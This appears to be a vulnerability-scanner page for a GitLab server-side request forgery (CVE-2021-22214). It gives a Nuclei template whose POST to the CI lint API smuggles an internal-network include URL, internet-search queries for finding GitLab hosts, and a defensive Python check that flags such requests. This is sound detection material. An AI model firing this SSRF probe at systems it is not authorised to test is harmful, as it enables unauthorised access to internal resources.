Gitlab CE/EE 10.5 - Server-Side Request Forgery
ID: CVE-2021-22214
Severity: high
Author: Suman_Kar,GitLab Red Team
Tags: cve2021,cve,gitlab,ssrf
Description
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
YAML Source
id: CVE-2021-22214

info:
  name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
  author: Suman_Kar,GitLab Red Team
  severity: high
  description: |
    GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
    - CVE-2021-39935
    - CVE-2021-22214
    - CVE-2021-22175
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.
  remediation: |
    Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39935
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
    - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
    - https://docs.gitlab.com/ee/api/lint.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2021-22214
    cwe-id: CWE-918
    epss-score: 0.09317
    epss-percentile: 0.94683
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query:
      - http.title:"GitLab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2021,cve,gitlab,ssrf

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"

    body: |
      {"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}

    headers:
      Content-Type: application/json

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - "does not have valid YAML syntax"
# digest: 4b0a0048304602210098ac39dfbb5c4121011de5ea6db351427bae89177d38f7d953ce6aad57088739022100b743a4f9e332ca4d70de5326e03531741fb94e4665dd71e8d942ad672765d32a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22214.yaml"
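
A defender-side check for the request this template sends, as an added example rather than code from the template or from GitLab: it pulls `include: remote:` URLs out of a `/api/v4/ci/lint` request body (for instance one captured at a proxy or WAF) and flags those aimed at loopback or other non-public addresses. The function names and the second sample body are constructed for illustration.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit

# Matches one-line "remote: <url>" entries in CI YAML. A regex keeps the example
# free of third-party YAML parsers (assumption: simple, unfolded entries).
REMOTE_RE = re.compile(r"^\s*-?\s*remote:\s*['\"]?(\S+?)['\"]?\s*$", re.MULTILINE)

# Request body taken from the template on this page.
TEMPLATE_BODY = r'{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}'
# Constructed benign body for comparison.
BENIGN_BODY = r'{"content": "include:\n  remote: https://gitlab.com/group/proj/-/raw/main/ci.yml"}'


def remote_includes(lint_body):
    """Return the include:remote URLs found in a CI lint JSON request body."""
    try:
        content = json.loads(lint_body).get("content", "")
    except (ValueError, AttributeError):
        return []  # not JSON, or not a JSON object
    return REMOTE_RE.findall(content) if isinstance(content, str) else []


def is_internal(url):
    """True when the URL host is localhost or an IP literal outside public space."""
    host = urlsplit(url).hostname or ""
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        # Also covers the single-integer spelling of an IPv4 address.
        ip = ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return False  # a DNS name: resolve it and re-check each address
    return not ip.is_global


def flag_lint_request(lint_body):
    """Return the remote include URLs in the body that target internal hosts."""
    return [u for u in remote_includes(lint_body) if is_internal(u)]


if __name__ == "__main__":
    for body in (TEMPLATE_BODY, BENIGN_BODY):
        print(flag_lint_request(body))
```
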